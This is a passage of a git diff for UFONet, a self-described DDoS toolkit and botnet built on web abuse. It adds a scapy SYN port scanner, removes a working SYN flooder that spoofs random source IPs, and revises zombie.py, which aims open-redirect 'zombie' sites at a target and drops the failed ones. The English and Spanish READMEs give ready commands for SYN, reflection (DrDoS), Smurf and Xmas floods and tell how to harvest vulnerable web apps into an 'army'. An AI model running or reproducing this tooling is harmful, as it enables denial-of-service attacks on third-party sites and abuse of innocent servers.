                             req = urllib2.Request(target_url + ogv, None, headers)
-                            ogv_file = urllib2.urlopen(req).read()
+                            ogv_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + ogv, None, headers)
                             ogv_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(ogv_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 ogvs[ogv] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -604,7 +604,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            wmv_file = urllib2.urlopen(req).read()
+                            wmv_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             wmv_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -616,13 +616,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + wmv, None, headers)
-                            wmv_file = urllib2.urlopen(req).read()
+                            wmv_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + wmv, None, headers)
                             wmv_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(wmv_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Video')
+                    print('[Error] [AI] Unable to retrieve info from Video -> [Discarding!]')
                     size = 0
                 wmvs[wmv] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -651,7 +651,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            css_file = urllib2.urlopen(req).read()
+                            css_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             css_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -663,13 +663,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + css, None, headers)
-                            css_file = urllib2.urlopen(req).read()
+                            css_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + css, None, headers)
                             css_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(css_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Style')
+                    print('[Error] [AI] Unable to retrieve info from Style -> [Discarding!]')
                     size = 0
                 csss[css] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -698,7 +698,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            js_file = urllib2.urlopen(req).read()
+                            js_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             js_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -710,13 +710,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + js, None, headers)
-                            js_file = urllib2.urlopen(req).read()
+                            js_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + js, None, headers)
                             js_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(js_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Script')
+                    print('[Error] [AI] Unable to retrieve info from Script -> [Discarding!]')
                     size = 0
                 jss[js] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -745,7 +745,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            xml_file = urllib2.urlopen(req).read()
+                            xml_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             xml_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -757,13 +757,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + xml, None, headers)
-                            xml_file = urllib2.urlopen(req).read()
+                            xml_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + xml, None, headers)
                             xml_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(xml_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Script')
+                    print('[Error] [AI] Unable to retrieve info from Script -> [Discarding!]')
                     size = 0
                 xmls[xml] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -792,7 +792,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            php_file = urllib2.urlopen(req).read()
+                            php_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             php_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -804,13 +804,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + php, None, headers)
-                            php_file = urllib2.urlopen(req).read()
+                            php_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + php, None, headers)
                             php_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(php_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Webpage')
+                    print('[Error] [AI] Unable to retrieve info from Webpage -> [Discarding!]')
                     size = 0
                 phps[php] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -839,7 +839,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            html_file = urllib2.urlopen(req).read()
+                            html_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             html_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -851,13 +851,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + html, None, headers)
-                            html_file = urllib2.urlopen(req).read()
+                            html_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + html, None, headers)
                             html_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(html_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Webpage')
+                    print('[Error] [AI] Unable to retrieve info from Webpage -> [Discarding!]')
                     size = 0
                 htmls[html] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -886,7 +886,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            jsp_file = urllib2.urlopen(req).read()
+                            jsp_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             jsp_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -898,13 +898,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + jsp, None, headers)
-                            jsp_file = urllib2.urlopen(req).read()
+                            jsp_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + jsp, None, headers)
                             jsp_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(jsp_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Webpage')
+                    print('[Error] [AI] Unable to retrieve info from Webpage -> [Discarding!]')
                     size = 0
                 jsps[jsp] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -933,7 +933,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            asp_file = urllib2.urlopen(req).read()
+                            asp_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             asp_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -945,13 +945,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + asp, None, headers)
-                            asp_file = urllib2.urlopen(req).read()
+                            asp_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + asp, None, headers)
                             asp_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(asp_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Webpage')
+                    print('[Error] [AI] Unable to retrieve info from Webpage -> [Discarding!]')
                     size = 0
                 asps[asp] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -980,7 +980,7 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url, None, headers)
-                            txt_file = urllib2.urlopen(req).read()
+                            txt_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url, None, headers)
                             txt_file = urllib2.urlopen(req, context=self.ctx).read()
@@ -992,13 +992,13 @@ class Inspector(object):
                         if self.ufonet.options.proxy: # set proxy
                             self.proxy_transport(self.ufonet.options.proxy)
                             req = urllib2.Request(target_url + txt, None, headers)
-                            txt_file = urllib2.urlopen(req).read()
+                            txt_file = urllib2.urlopen(req, context=self.ctx).read()
                         else:                    
                             req = urllib2.Request(target_url + txt, None, headers)
                             txt_file = urllib2.urlopen(req, context=self.ctx).read()
                     size = len(txt_file)
                 except: 
-                    print('[Error] - Unable to retrieve info from Text file')
+                    print('[Error] [AI] Unable to retrieve info from Text file -> [Discarding!]')
                     size = 0
                 txts[txt] = int(size)
                 print('(Size: ' + str(size) + ' Bytes)')
@@ -1034,9 +1034,9 @@ class Inspector(object):
         print '-'*20
         print '='*80
         if(biggest_files=={}):
-            print "\nNot any link found on target\n\n"
+            print "\n[Info] [AI] Not any link found on target! -> [Exiting!]\n\n"
             print '='*80 + '\n'
-            return #sys.exit(2)
+            return
         biggest_file_on_target = max(biggest_files.keys(), key=lambda x: biggest_files[x]) # search/extract biggest file value from dict
         target_host = urlparse(target)
         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path

+ 113 - 0
core/tools/ufoscan.py

@@ -0,0 +1,113 @@
+#!/usr/bin/env python 
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys, time, urlparse
+
+try:
+    from scapy.all import *
+except:
+    print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
+    sys.exit(2)
+
+# UFONet port scanner (UFOSCAN) class
+def randInt():
+    x = random.randint(1,65535) # TCP ports
+    return x
+ 
+def scan(self, ip, port, openp, closed):
+    src_port = RandShort()
+    seq = randInt()
+    window = randInt()
+    p = IP(dst=ip)/TCP(sport=src_port, dport=port, seq=seq, window=window, flags='S')
+    resp = sr1(p, timeout=2)
+    if str(type(resp)) == "<type 'NoneType'>":
+        closed = closed + 1
+    elif resp.haslayer(TCP):
+        if resp.getlayer(TCP).flags == 0x12:
+            send_rst = sr(IP(dst=ip)/TCP(sport=src_port, dport=port, flags='AR'), timeout=1)
+            openp.append(port) # open port found!
+            print "\n" + "="*54
+            print "[Info] [AI] [UFOSCAN] OPEN port found! [ " + str(port) + " ]"
+            print "="*54 + "\n"
+        elif resp.getlayer(TCP).flags == 0x14:
+            closed = closed + 1
+    return openp, closed
+
+def is_up(ip):
+    p = IP(dst=ip)/ICMP()
+    resp = sr1(p, timeout=10)
+    if resp == None:
+        return False
+    elif resp.haslayer(ICMP):
+        return True
+
+class UFOSCAN(object):
+    def scanning(self, target, portX, portY):
+        print "[Info] [AI] [UFOSCAN] Emitting X-Ray into range: [ "+str(portX)+"-"+str(portY)+" ]\n"
+        print "="*74, "\n"
+        if target.startswith('http://'):
+            target = target.replace('http://','')
+        elif target.startswith('https://'):
+            target = target.replace('https://','')
+        else:
+            print "[Error] [AI] [UFOSCAN] Target url not valid ("+target+")! -> It should starts with 'http(s)://'\n"
+            return
+        try:
+            ip = socket.gethostbyname(target)
+        except:
+            try:
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                url = urlparse(target)
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
+            except:
+                ip = target
+        if ip == "127.0.0.1" or ip == "localhost":
+            print "[Info] [AI] [UFOSCAN] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
+            return
+        start_time = time.time()
+        try:
+            ports = range(int(portX), int(portY+1))
+        except:
+            portX = 1
+            portY = 1024 # 1024
+            print "[Info] [AI] [UFOSCAN] Not any range of ports selected. Using by default: [ 1-1024 ]\n"
+            ports = range(int(portX), int(portY+1))
+        portX = str(portX)
+        portY = str(portY+1)
+        if is_up(ip):
+            openp = []
+            closed = 0
+            print "\n" + "="*44
+            print "[Info] [AI] [UFOSCAN] Host %s is UP!" % ip
+            print "="*44
+            print "-"*22
+            for port in ports:
+                openp, closed = scan(self, ip, port, openp, closed)
+            duration = time.time()-start_time
+            print "-"*22
+            print "="*44, "\n"
+            print "[Info] [AI] [UFOSCAN] Scan completed in: [ %s ]" % duration
+            if closed == len(ports):
+                print "\n[Info] [AI] [UFOSCAN] [ %s/%d ] CLOSED ports. -> [Exiting!]\n" % (closed, len(ports)-1)
+            else:
+                print "\n[Info] [AI] [UFOSCAN] [ %s/%d ] OPEN ports FOUND!\n" % (len(openp), len(ports)-1)
+                print "    [-] Target: [ " + str(ip) + " ]\n"
+                for o in openp:
+                    print "      [+] OPEN PORT: [ " + str(o) + " ]"
+                print ""
+        else:
+            duration = time.time()-start_time
+            print "-"*22
+            print "="*44, "\n"
+            print "[Info] [AI] [UFOSCAN] Host %s is DOWN!" % ip
+            print "\n[Info] [AI] [UFOSCAN] Scan completed in: [ %s ]" % duration + "\n"

+ 26 - 0
core/txt/motherships.txt

@@ -99,3 +99,29 @@ Tardis
 Magrathea
 Covenant
 Ganymede
+R.DelaFuente
+Iditarod
+Asimov
+MissRoot
+Alcubierre
+Dirac
+Sócrates
+Seppala
+Aoroi
+Churinov
+Tukä
+Carl Sagan
+Hawking
+Agnódice
+Drake
+A.Scherr
+Munder
+Balto
+Sota
+UNIVAC
+Antikitera
+Togo
+Red Sprite
+C.Orquín
+Kräken
+Mitra

+ 0 - 61
core/ufosyn.py

@@ -1,61 +0,0 @@
-#!/usr/bin/env python 
-# -*- coding: utf-8 -*-"
-"""
-UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
-
-You should have received a copy of the GNU General Public License along
-with UFONet; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-"""
-import random, socket, os, sys
-from scapy.all import *
-
-# UFONet TCP SYN Flooder (UFOSYN)
-def randIP():
-	ip = ".".join(map(str, (random.randint(0,255)for _ in range(4))))
-	return ip
-
-def randInt():
-	x = random.randint(1,65535) # TCP ports
-	return x	
-
-def synize(ip, port, rounds):
-    n=0
-    for x in range (0,int(rounds)):
-        n=n+1
-        sport = randInt()
-        seq = randInt()
-        window = randInt()
-        IP_p = IP()
-        IP_p.src = randIP()
-        try:
-            IP_p.dst = ip
-        except:
-            print "[Error] UFOSYN: Failed to engage with 'quantum hook' ["+str(n)+"]"
-            break
-        TCP_l = TCP()	
-        TCP_l.sport = sport
-        TCP_l.dport = port
-        TCP_l.flags = "S"
-        TCP_l.seq = seq
-	TCP_l.window = window
-        try:
-            send(IP_p/TCP_l, verbose=0)
-            print "[Info] UFOSYN: Firing 'quantum hook' ["+str(n)+"] -> Status: FLOODING!"
-        except:
-            print "[Error] UFOSYN: Failed to engage with 'quantum hook' ["+str(n)+"]"
-
-class UFOSYN(object):
-    def attacking(self, target, rounds):
-        print "[Info] TCP SYN Flooder (UFOSYN) is ready to fire: [" , rounds, "quantum hooks ]\n"
-        if target.startswith('http://'):
-            target = target.replace('http://','')
-            port = 80
-        elif target.startswith('https://'):
-            target = target.replace('https://','')
-            port = 443
-        try:
-            ip = socket.gethostbyname(target)
-        except:
-            ip = target
-        synize(ip, port, rounds) # attack with UFOSYN using threading

+ 5 - 2
core/update.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python 
 # -*- coding: utf-8 -*-"
 """
-UFONet - Denial of Service Toolkit - 2013/2014/2015/2016/2017/2018 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -16,13 +16,16 @@ class Updater(object):
     Update UFONet automatically from a .git repository
     """     
     def __init__(self):
-        GIT_REPOSITORY = "https://github.com/epsylon/ufonet"
+        GIT_REPOSITORY = "https://code.03c8.net/epsylon/ufonet"
+        GIT_REPOSITORY2 = "https://github.com/epsylon/ufonet"
         rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', ''))
         if not os.path.exists(os.path.join(rootDir, ".git")):
             print "Not any .git repository found!\n"
             print "="*30
             print "\nTo have working this feature, you should clone UFONet with:\n"
             print "$ git clone %s" % GIT_REPOSITORY
+            print "\nAlso you can try this other mirror:\n"
+            print "$ git clone %s" % GIT_REPOSITORY2 + "\n"
         else:
             checkout = execute("git checkout . && git pull", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]
             print checkout

File diff suppressed because it is too large
+ 700 - 188
core/webgui.py


+ 28 - 15
core/zombie.py

@@ -1,16 +1,22 @@
 #!/usr/bin/env python 
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - DDoS Botnet via Web Abuse - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import pycurl, StringIO, md5, re
+import StringIO, md5, re, sys
 import time, threading, random
 from randomip import RandomIP
 
+try:
+    import pycurl
+except:
+    print "\nError importing: pycurl lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-pycurl' or 'pip install pycurl'\n"
+    sys.exit(2)
+
 class Zombie: # class representing a zombie
     # constructor: function to construct a zombie 
     # ufo: UFONet object, some state variables are recovered as well
@@ -45,7 +51,7 @@ class Zombie: # class representing a zombie
             c.setopt(pycurl.URL, payload) # set 'self.zombie' payload
             c.setopt(pycurl.NOBODY, 0) # use GET
         if self.ufo.external == True:
-            external_service = "https://www.downforeveryoneorjustme.com/" # external check
+            external_service = "https://downforeveryoneorjustme.com/" # external check
             if options.target.startswith('https://'): # fixing url prefix
                 options.target = options.target.replace('https://','')
             if options.target.startswith('http://'): # fixing url prefix
@@ -72,7 +78,7 @@ class Zombie: # class representing a zombie
             else:                                    
                 url_attack = self.zombie + options.target # Use self.zombie vector to connect to original target url
             if self.ufo.options.verbose:
-                print "[Info] Payload:", url_attack
+                print "[Info] [Zombies] Payload:", url_attack
             c.setopt(pycurl.URL, url_attack) # GET connection on target site
             c.setopt(pycurl.NOBODY, 0)  # use GET
         # set fake headers (important: no-cache)
@@ -140,16 +146,16 @@ class Zombie: # class representing a zombie
             c.setopt(pycurl.TIMEOUT, options.timeout)
             c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
         else:
-            c.setopt(pycurl.TIMEOUT, 5) # trying low value to control OS/python threading overflow when so much threads/bots open
-            c.setopt(pycurl.CONNECTTIMEOUT, 5)
+            c.setopt(pycurl.TIMEOUT, 1) # low value trying to control OS/python overflow when too many threads are open
+            c.setopt(pycurl.CONNECTTIMEOUT, 1)
         if options.delay: # set delay
             self.ufo.delay = options.delay
         else:
-            self.ufo.delay = 0
+            self.ufo.delay = 0 # default delay
         if options.retries: # set retries
             self.ufo.retries = options.retries
         else:
-            self.ufo.retries = 1
+            self.ufo.retries = 0 # default retries
         try: # try to connect
             c.perform()
             time.sleep(self.ufo.delay)
@@ -166,7 +172,7 @@ class Zombie: # class representing a zombie
             code_reply = c.getinfo(pycurl.HTTP_CODE)
             reply = b.getvalue()
             if options.verbose:
-                print "[Info] Reply:"
+                print "[Info] [AI] HEAD Reply:"
                 print "\n", reply
             if self.ufo.options.testrpc:
                 return reply
@@ -175,19 +181,26 @@ class Zombie: # class representing a zombie
         if self.ufo.external == True: # External reply
             external_reply = h.getvalue()
             if options.verbose:
-                print "[Info] Reply:"
+                print "[Info] [AI] EXTERNAL Reply:"
                 print "\n", external_reply
             return external_reply
         if self.payload == True: # Payloads reply
             payload_reply = h.getvalue()
             if options.verbose:
-                print "[Info] Reply:"
+                print "[Info] [AI] PAYLOAD Reply:"
                 print "\n", payload_reply
             return payload_reply
         if self.attack_mode == True: # Attack mode reply
             attack_reply = h.getvalue()
+            reply_code = c.getinfo(c.RESPONSE_CODE)
             if options.verbose:
-                print "[Response] code: ", c.getinfo(c.RESPONSE_CODE)," time ",c.getinfo(c.TOTAL_TIME)," size ", len(attack_reply)
-            return [    c.getinfo(c.RESPONSE_CODE), 
-                        c.getinfo(c.TOTAL_TIME), 
-                        len(attack_reply)]
+                print "[Info] [AI] [Zombies] "+self.zombie+" -> REPLY (HTTP Code: "+ str(reply_code)+" | Time: "+str(c.getinfo(c.TOTAL_TIME))+" | Size: " + str(len(attack_reply))+")"
+                time.sleep(5) # managing screen (multi-threading flow time compensation)
+            if len(attack_reply) == 0:
+                print "[Info] [Zombies] " + self.zombie + " -> FAILED (cannot connect!)"
+                if not self.ufo.options.disablepurge: # when purge mode discard failed zombie
+                    self.ufo.discardzombies.append(self.zombie)
+                    self.ufo.num_discard_zombies = self.ufo.num_discard_zombies + 1
+            return [c.getinfo(c.RESPONSE_CODE), 
+                    c.getinfo(c.TOTAL_TIME), 
+                    len(attack_reply)]

+ 31 - 10
docs/LEEME.txt

@@ -42,7 +42,7 @@ UFONet - es un conjunto de herramientas diseñado para lanzar ataques DDoS y DoS
 En los siguientes enlaces tienes más información:
 
    - CWE-601:Open Redirect: 
-     http://cwe.mitre.org/data/definitions/601.html
+     https://cwe.mitre.org/data/definitions/601.html
 
    - OWASP:URL Redirector Abuse: 
      https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
@@ -113,8 +113,8 @@ Por defecto, UFONet utiliza un motor de búsqueda que se llama 'Yahoo'. Pero pue
 
 Ésta es la lista de motores de búsqueda que funcionan con la fecha de la última vez que se han probado:
 
-        - bing [26/09/2018: OK!]
-        - yahoo [26/09/2018: OK!]
+        - bing  [30/12/2018: OK!]
+        - yahoo [30/12/2018: OK!]
 
 También puedes buscar masívamente utilizando todos los motores de búsqueda soportados:
 
@@ -132,12 +132,12 @@ O puedes hacer que la herramienta búsque de manera autómatica el mayor número
 Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido, 
 para ver si las urls son vulnerables.
 
-       Want to check if they are valid zombies? (Y/n)
+      Do you want to check if the NEW possible zombies are valid? (Y/n)
 
-También serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente 
+Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente 
 aquellas aplicaciones web que sean vulnerables.
 
-       Want to update your list? (Y/n)
+      Do you want to update your army? (Y/n)
 
 Si respondes 'Y', tus nuevos 'zombies' se sumarán al fichero: zombies.txt
 
@@ -181,7 +181,12 @@ Finalmente, puedes ordenar a tus 'zombies' que te ataquen a ti mismo, para ver c
 Al final del proceso, serás preguntado por si quieres hacer un chequeo, de la lista que has recibido, 
 para ver si las urls son vulnerables.
 
-       Want to check if they are valid zombies? (Y/n)
+       Do you want to check if the NEW possible zombies are valid? (Y/n)
+
+Después serás preguntado por si quieres actualizar tu lista de 'zombies' añadiendo solamente
+aquellas aplicaciones web que sean vulnerables.
+
+      Do you want to update your army? (Y/n)
 
 Si respondes 'Y', tu fichero: "botnet/zombies.txt" será actualizado.
 
@@ -347,11 +352,23 @@ Y también puedes conectar UFOSYN (requiere acceso mediante 'root') para comenza
 
      sudo python ufonet -a http://target.com --ufosyn 100
 
-Ambos ataques pueden ser combinados haciendo que UFONet utilice distintas técnicas de DDoS y DoS, al mismo tiempo:
+O hacer un ataque SPRAY ('root' requerido) para lanzar una Denegación de Servicio Distribuída y Reflejada (DrDoS):
+
+     sudo python ufonet -a http://target.com --spray 100
+
+Un ataque SMURF ('root' requerido) para enviar paquetes de 'Propagación' ICMP de manera distribuída:
+
+     sudo python ufonet -a http://target.com --smurf 101
 
-     ./python ufonet -a http://target.com --loic 100 --loris 100
+O un ataque XMAS ('root' requerido) que inundará tu objetivo con paquetes 'Árbol de Navidad':
 
-     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100
+     sudo python ufonet -a http://target.com --xmas 101
+
+Todos los ataques pueden ser combinados haciendo que UFONet utilice distintas técnicas de DDoS y DoS, al mismo tiempo:
+
+     python ufonet -a http://target.com --loic 100 --loris 100
+
+     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101
 
 ###############################
 # Actualizando
@@ -416,6 +433,10 @@ más algunas "extra":
 # Timelog
 ###############################
 
+--------------------------
+31.12.2018 : v.1.2
+--------------------------
+
 --------------------------
 26.09.2018 : v.1.1
 --------------------------

+ 34 - 14
docs/README.txt

@@ -42,7 +42,7 @@ UFONet - is a toolkit designed to launch DDoS and DoS attacks.
 See these links for more info:
 
    - CWE-601:Open Redirect: 
-     http://cwe.mitre.org/data/definitions/601.html
+     https://cwe.mitre.org/data/definitions/601.html
 
    - OWASP:URL Redirector Abuse: 
      https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
@@ -112,8 +112,8 @@ By default UFONet will use a search engine called 'Yahoo'. But you can choose a
 
 This is the list of available search engines with last time that they were working:
 
-        - bing [26/09/2018: OK!]
-        - yahoo [26/09/2018: OK!]
+        - bing  [30/12/2018: OK!]
+        - yahoo [30/12/2018: OK!]
 
 You can also search massively using all search engines supported:
 
@@ -130,11 +130,11 @@ Or you can make the tool to search for the maximun number of results automatical
 At the end of the process, you will be asked if you want to check the list retrieved to see 
 if the urls are vulnerable.
 
-       Want to check if they are valid zombies? (Y/n)
+       Do you want to check if the NEW possible zombies are valid? (Y/n)
 
-Also, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
+After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
 
-       Want to update your list? (Y/n)
+       Do you want to update your army? (Y/n)
 
 If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt
 
@@ -178,7 +178,11 @@ Finally, you can order your 'zombies' to attack you and see how they reply to yo
 At the end of the process, you will be asked if you want to check the list retrieved to see 
 if the urls are vulnerable.
 
-       Want to check if they are valid zombies? (Y/n)
+       Do you want to check if the NEW possible zombies are valid? (Y/n)
+
+After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
+
+       Do you want to update your army? (Y/n)
 
 If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.
 
@@ -343,11 +347,23 @@ And you can connect UFOSYN (it requires 'root' access) to start a powerful TCP/S
 
      sudo python ufonet -a http://target.com --ufosyn 100
 
-Both ways could be combined, so UFONet can attack DDoS and DoS, at the same time:
+Or make a SPRAY ('root' required) attack to launch a Distributed 'Reflection' Denial of Service (DrDoS):
+
+     sudo python ufonet -a http://target.com --spray 100
+
+A SMURF ('root' required) attack to send Distributed ICMP 'Broadcast' packets:
+
+     sudo python ufonet -a http://target.com --smurf 101
+
+Or a XMAS ('root' required) attack that will flood your target with 'Christmas Tree' packets
 
-     ./python ufonet -a http://target.com --loic 100 --loris 100
+     sudo python ufonet -a http://target.com --xmas 101
 
-     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100
+All ways could be combined, so UFONet can attack DDoS and DoS, at the same time:
+
+     python ufonet -a http://target.com --loic 100 --loris 100
+
+     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101
 
 ###############################
 # Updating
@@ -411,6 +427,10 @@ This will open a tab on your default browser with all features of the tool and s
 # Timelog
 ###############################
 
+--------------------------
+31.12.2018 : v.1.2
+--------------------------
+
 --------------------------
 26.09.2018 : v.1.1
 --------------------------
@@ -420,19 +440,19 @@ This will open a tab on your default browser with all features of the tool and s
 --------------------------
 
 --------------------------
-14.07.2017 : v.0.9b
+14.07.2017 : v.0.9
 --------------------------
 
 --------------------------
-21.10.2016 : v.0.8b
+21.10.2016 : v.0.8
 --------------------------
 
 --------------------------
-17.08.2016 : v.0.7b
+17.08.2016 : v.0.7
 --------------------------
 
 --------------------------
-05.11.2015 : v.0.6b
+05.11.2015 : v.0.6
 --------------------------
 
 --------------------------

+ 2 - 1
docs/VERSION

